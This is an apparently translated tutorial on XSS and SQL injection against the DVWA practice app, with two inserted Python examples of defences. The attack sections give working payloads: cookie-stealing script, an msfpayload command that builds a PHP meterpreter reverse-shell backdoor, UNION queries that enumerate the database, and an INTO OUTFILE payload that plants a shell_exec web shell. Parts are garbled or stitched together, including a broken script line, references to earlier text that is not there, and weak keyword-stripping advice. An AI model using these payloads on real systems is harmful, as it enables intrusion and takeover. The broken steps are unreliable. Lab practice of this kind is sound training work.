Cross-Site Scripting, abbreviated XSS (rather than CSS, to avoid confusion with Cascading Style Sheets in HTML), is an attack technique that injects into dynamic websites (ASP, PHP, CGI, JSP, ...) HTML tags or dangerous script code that can harm other users. The dangerous code injected is mostly written in client-side scripting languages such as JavaScript, JScript and DHTML, and can also consist of HTML tags. XSS is one of the most common flaws; a great many websites suffer from it, which is why more and more people pay attention to it.
b) XSS classification

XSS can be classified as follows:

Stored XSS Attacks

Stored XSS is an attack form in which the attacker injects a dangerous script (usually JavaScript) into our website through some feature (e.g. comments, guestbook, posting), so that when other members visit the website they are hit by the attacker's malicious code. This code is usually stored in the website's database, hence the name Stored. Stored XSS arises because we did not properly filter the data submitted by members, which lets the malicious code be saved in the website's database.

Reflected XSS Attacks

In this form, the attacker usually appends malicious code to our website's URL and sends it to the victim; if the victim visits that URL, they are hit by the malicious code. This happens because we did not filter the input coming from our site's URL.

XSS Attack Consequences

This method is similar to the two above; the difference is how the payload reaches the server. A read-only or brochureware site can also be vulnerable to XSS. XSS can cause damage ranging from small to large, such as taking over a user's account. An XSS attack can obtain the session cookie, causing the loss of the account, or affect end-user data by installing a Trojan, redirecting visitors to another page, or changing a page's content.
c) How XSS works

Basically, the operation of XSS can be described as follows:

Description of XSS operation. By the principle above, a hacker can abuse security holes in a website. Any HTML tag can be a tool for XSS attacks; among them, the IMG and IFRAME tags can make the browser load other websites while the HTML is being displayed. Exploiting this principle, hackers can inject malicious code and subject the victim machine to an XSS attack.
d) Harm caused by XSS

XSS is usually used for the following purposes:
Stealing information
Giving the hacker access to sensitive information
Obtaining free access to content that should be paid for
Spying on the preferences of network users
Changing the appearance of (defacing) a web page
Denial-of-service (DoS) attacks

Malicious JavaScript code can access any of the following:
- Persistent cookies (of the XSS-vulnerable site) kept by the browser.
- In-memory cookies (of the XSS-vulnerable site).
- The names of all windows opened from the XSS-vulnerable site.
- Any information accessible from the current DOM (such as values and HTML code).

e) XSS attack

Run the script <script>alert('XSS');</script> to show an alert in the web browser.

The result we get, instead of the text only being saved in the database:

View the user's cookie: <script>alert(document.cookie);</script>

We can send this cookie directly to the attacking machine instead of only showing it on screen. We can insert iframe tags: <iframe src="http://www.ctu.edu.vn"></iframe>

In addition, we can use the Metasploit Framework (introduced above) to attack and take control, with a backdoor that lets the target machine connect back. Code to create the backdoor:

msfpayload php/meterpreter/reverse_tcp LHOST=192.168.10.102 LPORT=4444 R > forum.php

Use msfconsole and set the parameters needed to listen for the connection on the server:

Back in XSS Stored, we use the script:

<script> Windows. </script>

After the script runs, the Metasploit Framework opens a connection and we can attack.

Some images of the attack:

f) Some methods of prevention and mitigation

No one can measure the full danger of XSS, but it is not too difficult to prevent. There are many ways to solve this problem. OWASP (The Open Web Application Security Project) states that, to build highly secure websites, user-supplied data should be handled as follows: accept only valid data; reject bad data; continuously check and sanitize data. Web developers can protect their websites from abuse through XSS attacks by ensuring that dynamically generated pages do not contain script tags, by filtering and validating input from the user, or by encoding and filtering the values output to the user.
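The difference between the DVWA levels described earlier (Low keeps the input, Medium strips the literal string <script>, High applies htmlspecialchars()) is the difference between no filtering, a blacklist and output encoding. The following is an added example, not from the original document and not DVWA's PHP, that renders the two payloads quoted in this section through each approach and then asks a real HTML parser which elements a browser would actually create; the comment wrapper markup is an assumption.

```python
import html
from html.parser import HTMLParser

# Payloads quoted from the DVWA section above, used here as test input.
SCRIPT_PAYLOAD = "<script>alert('XSS');</script>"
IFRAME_PAYLOAD = '<iframe src="http://www.ctu.edu.vn"></iframe>'


def render_vulnerable(comment):
    """Like DVWA's Low level: user input is placed into the page unchanged."""
    return f"<div class='comment'>{comment}</div>"


def render_blacklist(comment):
    """Like DVWA's Medium level as described above: only the literal string
    '<script>' is removed, every other tag passes through."""
    return f"<div class='comment'>{comment.replace('<script>', '')}</div>"


def render_escaped(comment):
    """Output encoding, the equivalent of PHP's htmlspecialchars(): <, >, &, and
    quotes become entities, so the browser shows the text instead of parsing it."""
    return f"<div class='comment'>{html.escape(comment, quote=True)}</div>"


class _TagCollector(HTMLParser):
    """Records every start tag the parser sees, i.e. every element a browser would create."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)


def elements_in(rendered_html):
    """Which elements a browser would build from the rendered fragment."""
    collector = _TagCollector()
    collector.feed(rendered_html)
    collector.close()
    return collector.tags


if __name__ == "__main__":
    for name, render in (("vulnerable", render_vulnerable),
                         ("blacklist", render_blacklist),
                         ("escaped", render_escaped)):
        for payload in (SCRIPT_PAYLOAD, IFRAME_PAYLOAD):
            print(f"{name:10s} {elements_in(render(payload))}")
```

The parser's answer is the point: the blacklist removes exactly the string it was told about and nothing else, so the iframe payload from this very section still becomes an element, while encoding turns both payloads into inert text. Encoding at output time, in the context where the value is inserted (HTML body here; attribute, URL and JavaScript contexts each need their own encoder), is the control OWASP's advice above refers to.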
2. SQL Injection
a) What is SQL Injection?

SQL Injection is one of the web hacking techniques that is becoming increasingly common today. By injecting SQL queries/commands into the input before it is passed to the web application for processing, we can log in without a username and password, execute commands remotely, dump data and obtain root on the SQL server. The tool used for the attack is any web browser, such as Internet Explorer, Firefox, Google Chrome, ...

b) Steps to exploit the vulnerable web page

Go to http://localhost/dvwa/ and choose SQL Injection (Blind):

We start exploiting the flaw from the User ID input field. Enter: 1

If we instead enter: 1' or '1'='1 or 1' or ''='# we get a very surprising result


The # character is used to cancel the effect of the final (') in the SQL query: SELECT first_name, last_name FROM users WHERE user_id = '$user_id'
View the database name: a' UNION select 1, database();#

View the user and system user: a' UNION select system_user(), user();#


Identify the user name in use and the MySQL version

View all database names together with the tables in the MySQL DBMS: a' UNION select table_schema, table_name from information_schema.tables;#

We can add a WHERE condition to narrow down the result: a' UNION select table_schema, table_name from information_schema.tables where table_schema='dvwa';#

List the columns in the table: a' UNION select table_name, column_name from information_schema.columns where table_schema='dvwa';#

Next, run the following statement:


' union select '','<?php $print=shell_exec($_GET["cmd"]); echo "<pre>$print</pre>"; ?>' into outfile 'C:\\xampp\\htdocs\\sqlinjection.php';#

Once it has been created, we only need to execute the command from the browser, appending ?cmd=command. For example, 192.168.10.20/sqlinjection.php?cmd=dir gives us:


Now we have full control of the victim's computer.


c) Countermeasures against SQL Injection

- Change the default password of the root user
- Delete all stored procedures that are present on the server by default
- Filter characters that can cause harm, such as quotation marks, ':' and '#', as soon as a query request is received from outside
- Update SQL with the latest releases
- Block sensitive SQL keywords by using a firewall to stop them right at the input
- Encrypt passwords
- Remove the keywords SELECT, DELETE, INSERT, ... from queries coming from outside.
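As an added example (not code from the original document or from DVWA), the two defences the page recommends for the attacks above, in Python: a parameterized query for the user_id lookup instead of the string-built query shown in section b), and output encoding for the values shown back to the user, the countermeasure named in section f). It assumes an in-memory SQLite table as a stand-in for DVWA's MySQL users table.

```python
import html
import sqlite3


def make_db():
    """Constructed stand-in for DVWA's MySQL `users` table (assumption: SQLite in memory)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Pablo", "Picasso")],
    )
    return conn


def lookup_vulnerable(conn, user_id):
    """The DVWA-style query built by string concatenation: the input becomes part of the SQL."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn, user_id):
    """Allow-list validation plus a parameterized query: the input is bound as a value only."""
    if not user_id.isdigit():  # only a numeric ID is valid input for this field
        return []
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


def render_row(first_name, last_name):
    """Output encoding: tags in stored data are rendered as text, not executed by the browser."""
    return f"<td>{html.escape(first_name)}</td><td>{html.escape(last_name)}</td>"


if __name__ == "__main__":
    db = make_db()
    payload = "1' or '1'='1"
    print("vulnerable:", lookup_vulnerable(db, payload))  # every row comes back
    print("safe:      ", lookup_safe(db, payload))        # nothing comes back
    print(render_row("<script>alert(document.cookie)</script>", "x"))
```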

105
